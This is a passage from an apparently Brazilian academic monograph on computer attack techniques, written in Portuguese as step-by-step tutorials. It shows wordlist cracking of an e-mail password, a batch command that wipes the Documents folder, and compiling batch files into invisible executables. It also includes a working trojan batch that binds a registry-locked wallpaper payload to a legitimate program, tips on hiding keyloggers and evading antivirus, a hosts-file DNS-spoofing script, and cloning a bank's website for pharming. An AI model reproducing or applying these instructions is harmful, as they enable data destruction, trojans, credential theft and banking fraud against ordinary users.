  45. 45. 45 A palavra “feliznatal” foi incluída na lista de palavras e corresponde à senha do e-mail. Quando a utilização de wordlists é feita, a descoberta da senha somente é possível se nalista de palavras existir a senha correta, fato que leva à conclusão de que a utilização de umaboa wordlist é fundamental para o sucesso do procedimento. Na figura a seguir, é possível verificar a tela de sucesso de um ataque real feito à conta dee-mail “papainoel3@yahoo.com.br”. O aplicativo tentou acessar a conta com as palavras queestavam na wordlist até encontrar a sequência de caracteres correspondente à senha correta. Quebra de senha de e-mail. Figura 21 Os dados utilizados no ataque como o servidor de e-mail (POP3) e a respectiva porta (aporta110 é utilizada por padrão) foram obtidos sem dificuldades ao digitar “configuraroutlook yahoo” em um site de busca na internet.
  46. 46. 46 Para invadir um site e visualizar, copiar, excluir ou alterar arquivos um cracker podeutilizar esta mesma ferramenta, apenas com configurações diferentes. Além de uma boa wordlist, o sucesso do ataque a um site também vai depender de umaboa configuração das opções “connections” e “timeout”. Invasão de site. Figura 22 A obtenção dos dados do servidor também pode ser feita através de sites de busca, com aprocura de páginas que contêm termos como “acessar ftp nome do local de hospedagem”.Para saber onde o site está hospedado, basta pesquisar o domínio em sites como o“http://www.whois.net/”. Após a obtenção da senha, para acessar o conteúdo do site a ser invadido, é possívelutilizar ferramentas dos próprios provedores de hospedagem (quando disponíveis) ou utilizarprogramas como o “FileZilla” para visualizar, copiar, excluir ou modificar arquivos do site. Em boa parte dos provedores de hospedagem, a senha do Secure Shell (SSH) é a mesmasenha do servidor FTP. Nestes casos, é possível fazer a utilização de programas como o“PuTTY” para manipular, além do conteúdo do servidor FTP, o banco de dados do site.
  47. 47. 474 Técnicas que demandam conhecimentos básicos Neste capítulo, são abordadas técnicas que, para executá-las, é necessário possuirconhecimentos básicos na área de informática ou, pelo menos, a leitura dos tópicos anteriores. Os códigos dos programas e de arquivos de execução em lote contidos nesta pesquisaforam desenvolvidos exclusivamente para esta monografia e suas finalidades se limitam àsacadêmicas. 4.1 Criação de um programa para fins maliciosos Para criar um programa de computador, evidentemente, é de extrema importância e quaseque indispensável possuir conhecimentos em linguagens de programação, porém, esteconhecimento não é um requisito obrigatório. Atualmente, códigos prontos de vírus são distribuídos e, com apenas algumasmodificações, o código pode tornar-se personalizado. É possível encontrar até mesmo sitesespecializados em automatizar o processo de desenvolvimento de vírus para computadores, oque criou um novo predicado dentro da categoria dos hackers iniciantes: os “apertadores debotão”, termo que faz alusão aos botões “Next, Next e Finish” (RUFINO, 2002, p.23). 4.1.2 Arquivos de processamento em lote (batch) Além de modificar códigos criados por outras pessoas, também é possível, a partir detécnicas bem difundidas na internet, executar tarefas maliciosas com poucas linhas decomandos. Um exemplo de como isso pode ser feito em um sistema Windows é abrir oconhecido bloco de notas, digitar sem as aspas “del %homepath%Documents*.* /f/s/q” esalvar o arquivo com a extensão “.bat”. Se for executado, todos os arquivos que estiverem napasta “Meus Documentos” serão excluídos. Um batch como o do exemplo acima, pode trazer um grande problema, caso documentosimportantes sejam apagados. Outro aspecto interessante dos arquivos de processamento emlote é que dificilmente eles são bloqueados por programas antivírus, permitindo suadistribuição via e-mail com maior facilidade (basta colocar em uma pasta compactada), secomparados a programas comuns. A partir de um arquivo de batch é possível executar diversos programas, processar
  48. 48. 48comandos específicos e condicionais, o que faz de um arquivo de processamento em lote umprograma completo. O código abaixo é um programa completo (composto exclusivamente decomandos disponíveis nas versões mais atuais dos sistemas operacionais da Microsoft) cujasfunções são: programar o computador para desligar, reiniciar, desligar computadoresremotamente, entre outras funções correlatas. Para fazer uso dele, não é necessário nenhumcompilador ou programa adicional. É preciso somente digitar os comandos abaixo em algumeditor de texto qualquer, salvar com a extensão “.bat” e executá-lo. rem Programa para desligar o computador rem Autor: Pedro Ramos @echo off color 1e title Programa que desliga o computador :Inicio cls echo. echo 1.Desligar echo 2.Reiniciar echo 3.Desligar ou reiniciar outro computador da rede echo 4.Fazer logoff echo 5.Hibernar echo 6.Cancelar desligamento echo 7.Sair deste programa echo. set /p escolha=Escolha uma tarefa(1,2,3,4,5,6 ou 7): if %escolha%==1 goto desligar if %escolha%==2 goto reiniciar if %escolha%==3 shutdown -i if %escolha%==4 shutdown -l if %escolha%==5 shutdown -h if %escolha%==6 shutdown -a if %escolha%==7 exit goto Inicio :desligar
  49. 49. 49clsset /p seg=Tempo para o Desligamento (em segundos):set /p msg=Digite uma mensagem de desligamento:set /p force=Forcar desligamento (s/n):if %force%==s set f=-fif not %force%==s set f=shutdown -s -t %seg% -c "%msg%" %f%goto cancelar:reiniciarclsset /p prog=Reiniciar com os programas atuais (somente para windows 7)(s/n):if %prog%==s set r=-gif not %prog%==s set r=-rset /p seg=Tempo para o reinicio (em segundos):set /p msg=Digite uma mensagem:set /p force=Forcar reinicio (s/n):if %force%==s set f=-fif not %force%==s set f=shutdown %r% -t %seg% -c "%msg%" %f%:cancelarclsecho 1.Cancelar tarefa atualecho 2.Voltar para a tela principalecho 3.Sair do programaset /p opcao=Escolha uma tarefa (1,2 ou 3):if %opcao%==1 shutdown -aif %opcao%==2 goto Inicioif %opcao%==3 exitgoto cancelar
  50. 50. 50 Os resultados obtidos com a execução do programa são similares aos da imagem aseguinte. Screenshots do batch. Figura 23 Nesta monografia, o programa é útil para demonstrar as inúmeras possibilidades demanipulação do sistema que um arquivo de execução em lotes pode oferecer. Por exemplo,caso algum comando que execute atividades maliciosas seja inserido nas primeiras linhas doprograma, ele será acionado e, dependendo do código, não aparecerá nada na tela neminfluenciará no funcionamento do aplicativo.4.1.2.1 Compilar um arquivo de processamento em lotes Uma das maiores desvantagens de utilizar um simples batch para disseminar vírus decomputadores, ou induzir algum usuário a executar atividades que ele não deseja, é o fato de oarquivo poder ser aberto em qualquer editor de texto e ter seu código visualizado e estudadopor completo. Uma forma de corrigir este problema é transformar o arquivo de processamentoem lotes em um executável do tipo “.exe”. Com a finalidade de exemplificar o processo, serãodiscutidas as funcionalidades do programa “Bat To Exe Converter v1.5”. Após o arquivo de processamento em lotes ser criado, resta apenas carregá-lo com o “BatTo Exe Converter”, escolher o diretório onde o novo arquivo executável será salvo e clicar em“Compile” para criar um arquivo não visualizável em qualquer editor de texto.
  51. 51. 51 Na imagem abaixo, é possível verificar que a opção “Invisible application” foiselecionada, o que significa que o novo programa “apagar arquivos.exe” será executado deforma imperceptível para o usuário. Compilar batch. Figura 24 4.1.3 Como um vírus pode ser anexado a outro arquivo Diversos aplicativos, como o “Senna Spy EXE Maker 2001” e o “Cactus Joiner“, podemser utilizados para anexar um vírus a outro arquivo qualquer – como uma foto ou vídeo – eexecutar o vírus de forma invisível para o usuário. O “Cactus Joiner“, por exemplo, ofereceaté mesmo permissões para abrir portas no firewall de forma automática. O sistema operacional Windows também possui um programa nativo que é capaz de
  52. 52. 52realizar a tarefa. Apesar de pouco utilizado e conhecido, o aplicativo pode ser executado emversões mais recentes do Windows com o comando “iexpress”. O “Winrar”, programaamplamente conhecido e normalmente utilizado para compactar ou descompactar arquivos,também possui opções pouco utilizadas ou conhecidas que permitem anexar um vírus a umarquivo qualquer e executá-lo de forma invisível. No exemplo subsequente, será exemplificada uma forma de criar um aplicativo que oqual, ao mesmo tempo em que executa um programa legítimo criado por outrem, de formatransparente, executa um programa malicioso (Malware) que insere uma foto de uma caveiracomo papel de parede da área de trabalho do Windows de uma maneira que não é possívelremovê-la a menos que o registro do Windows seja editado. Para esta tarefa, também pode serutilizado o programa “Bat To Exe Converter” com a escolha de algumas opçõespersonalizadas. Neste exemplo, será adicionado o programa “instalar papel de parede.bat” e a imagem“caveira.jpg” (que ficará como o papel de parede) ao editor de textos “Atlantis.exe”. O conteúdo do arquivo de execução em lotes é o seguinte: @echo off rem Criado para fins acadêmicos por Pedro Ramos @mkdir %homepath%Windows @move /y caveira.jpg %homepath%WindowsSystem.jpg @attrib +R +S +H %homepath%WindowsSystem.jpg @reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v Wallpaper/t REG_SZ /d "%homepath%WindowsSystem.jpg" /f @reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /vWallpaperStyle /t REG_SZ /d 2 /f @start Atlantis.exe Há sete linhas de comando no arquivo (cada linha de comando começa com”@”) que sãosuficientes para, de forma transparente, criar um diretório chamado “Windows” na pasta dousuário que executar o programa, inserir o arquivo de imagem que servirá de plano de fundona área de trabalho (renomeado para “System.jpg”) dentro do novo diretório, ocultar eproteger o novo arquivo, inserir alterações no registro para definir o papel de paredeimpedindo ele seja alterado e, por último, executar o aplicativo original (Atlantis.exe).
  53. 53. 53 Ao escolher a opção “Invisible application”, somente o batch será executado de forma“transparente”, ou seja, o editor de textos “Atlantis” será executado e funcionaránormalmente, o que permite que o programa possa ser executado diversas vezes pelo usuáriosem que ele suspeite da integridade do arquivo. Executar de forma invisível. Figura 25 Diversas outras opções são disponibilizadas pelo aplicativo e podem ser utilizadas deacordo com a função do novo programa desenvolvido. A opção “Encrypt the program”, porexemplo, pode ser útil quando a intenção é camuflar um vírus já conhecido e evitar que eleseja detectado pelo programa antivírus. A inclusão de quaisquer arquivos como programas,imagens e vídeos pode ser feita ao clicar na aba “Include”.
  54. 54. 54 Da mesma forma que a imagem da caveira foi anexada, um vírus ou um programa queregistra as imagens da tela e as teclas digitadas pelo usuário (image keylogger) também podeser adicionado, possibilitando a captura de senhas de contas bancárias digitadas em tecladosvirtuais, por exemplo. Incluir quaisquer arquivos ao programa. Figura 26 Caso seja necessário deixar o novo programa com a aparência bem parecida à do original,a aba “Versioninformations” oferece algumas opções. Incluir ícone. Figura 27
  55. 55. 55 Após compilado, o resultado será o seguinte: Comparação de arquivos. Figura 28 É possível verificar que o arquivo gerado pelo programa é pouco maior que o original,pois contém uma foto e um arquivo de batch. O ícone utilizado também é pouco diferente,porém, nada impede que um ícone idêntico seja utilizado. 4.2 DNS spoofing O DNS, acrônimo de (Domain Name System), é um recurso utilizado para “traduzir”nomes de computadores/servidores para seu real endereço lógico (endereço IP). Por exemplo,o servidor que armazena o site de buscas “Google” possui um endereço (algo como“72.14.253.104”) que o permite ser localizado na internet. Memorizar este endereço pode nãoser uma das tarefas mais simples quando se tratar de vários sites na internet, cada um com umendereço diferente. Além disso, mesmo que o endereço de e-mail “mario@129.2.69.24” sejamemorizado, caso ocorra uma mudança de servidor de correio eletrônico (por tornar-seobsoleto, por exemplo) o endereço de e-mail será modificado. Para resolver esse problemaforam criadas listas contendo os nomes dos servidores e seus respectivos endereços(TANENBAUM, 2003, p. 439). O DNS spoofing, é a técnica que consiste em manipular os registros de DNS de forma quea conexão seja direcionada para um local diferente do original. Há diversas maneiras demanipular registros de DNS e, uma das mais conhecidas é manipular um arquivo chamado“hosts”, presente em boa parte dos sistemas operacionais.
  56. 56. 56 O código a seguir é um exemplo de como pode ser criado um arquivo de processamentoem lotes para manipular o arquivo “hosts” dos sistemas operacionais mais atuais daMicrosoft. ipconfig /flushdns echo. >>%systemroot%System32driversetchosts echo 74.6.239.84 www.google.com>>%systemroot%System32driversetchosts echo 74.6.239.84 www.google.com.br>>%systemroot%System32driversetchosts Conforme visto nos capítulos anteriores, o código acima pode ser digitado em um editorde texto qualquer e, após ser salvo com a extensão “.bat”, pode ser compilado para executarde forma invisível e anexado a outro arquivo íntegro. Após sua execução, toda vez que ousuário tentar acessar o site de buscas “www.google.com.br” ou “www.google.com”, serádirecionado para o site de buscas do “Yahoo” do Reino Unido e Irlanda do Norte, cujoendereço atual é “74.6.239.84”. A figura abaixo foi originada de um ataque experimental real. Redirecionamento do site. Figura 29
  57. 57. 57 É importante ressaltar que mesmo durante o acesso ao site “Yahoo”, a barra de endereçosainda continua a mostrar o endereço que o usuário desejava acessar. Da mesma forma que foipossível direcionar para o “Yahoo”, um usuário que tentava acessar o “Google”, um códigosemelhante ao que foi apresentado há pouco pode ser utilizado para direcionar um usuário quequeira acessar sua conta bancária ao computador de um cracker ou servidor por elemanipulado. Caso um usuário seja direcionado para um site falso de uma instituiçãofinanceira e o site for bem feito, dificilmente a pessoa a ser enganada desconfiará de umafraude. Caso o usuário que executar o arquivo malicioso tenha permissões de administradordo sistema, dificilmente o direcionamento dos endereços não obterá êxito ou será bloqueadopor um firewall ou antivírus. 4.3 Fraude em contas bancárias A invasão de contas bancárias talvez seja um dos golpes mais temidos por quem faz usoda tecnologia para movimentações financeiras pela internet. Só no Brasil, estima-se que cercade 32,5 milhões de pessoas utilizam a internet para realizar transações bancárias (VALLE,2010). Um ataque que atinja apenas um por cento deste público, afetará mais de 300 milpessoas. Mesmo que seja um ataque mal elaborado e de fácil percepção por parte do usuáriodo sistema, caso consiga enganar apenas 0,01 por cento das pessoas afetadas pelo ataque,mais de trinta usuários da internet poderão ter seu dinheiro roubado. Uma grande variedade de técnicas é utilizada para cometer crimes digitais que envolveminstituições financeiras. Algumas delas já são bem conhecidas, por grande parte das empresase usuários da internet, o que leva à conclusão de que, para um criminoso realizar um ataquecom sucesso, a combinação de técnicas é o modo mais eficiente. Mesmo com grande investimento em segurança de informação feito por parte dasinstituições financeiras, dificilmente é possível debelar crackers tenazes, o que leva a crer queo investimento em conscientização dos usuários é uma boa medida de segurança. 4.3.1 Pharming Um site falso é, atualmente, uma das ferramentas mais utilizadas por criminosos daárea de informática para enganar usuários da internet que acessam sites de instituiçõesfinanceiras. Uma das razões para a crescente prática desse tipo de crime é a facilidade com
  58. 58. 58que um site original pode ser copiado e a grande quantidade de usuários que são facilmenteinduzidos a acessá-los. Dependendo da forma como foi desenvolvido e de sua complexidade,muitas vezes é possível copiá-lo de forma integral, o que dificulta a percepção de que o site éfalso. Até mesmo sites mais complexos, como sites de instituições financeiras e comércioseletrônicos, são passíveis de cópia. Qualquer usuário da internet que utilize um navegadorcomum como o “Internet Explorer” pode tentar. Para exemplificar como isso pode ser feito,foi copiado o site de uma instituição financeira. No navegador “Internet Explorer” foi digitado o seguinte endereço: “www.bb.com.br”. No menu “arquivos”, escolheu-se a opção “Salvar como...” Salvar site. Figura 30 Após a escolha da opção “Salvar como...”, uma nova janela foi aberta com umamensagem dizendo que a página não poderia ser completamente salva e perguntando:“Gostaria de salvar a página mesmo assim?”. Após clicar em “Sim” para a resposta àpergunta, uma nova janela conforme a figura a seguir foi aberta.
  59. 59. 59 Após o site ser copiado, foi aberto o arquivo “[bb_com_br].htm” e a página dainstituição foi exibida. Página WEB completa. Figura 31 Até mesmo as fotos que estavam no site foram copiadas, como é possível verificar naimagem a seguir. Site falso. Figura 32 Nem todos os arquivos podem ser baixados desta maneira e a perfeição de um site falsodependerá inteiramente da habilidade que o cracker tem em desenvolver sites, além de suacriatividade para modificar os itens que ele não consegue copiar com perfeição. Na imagem

×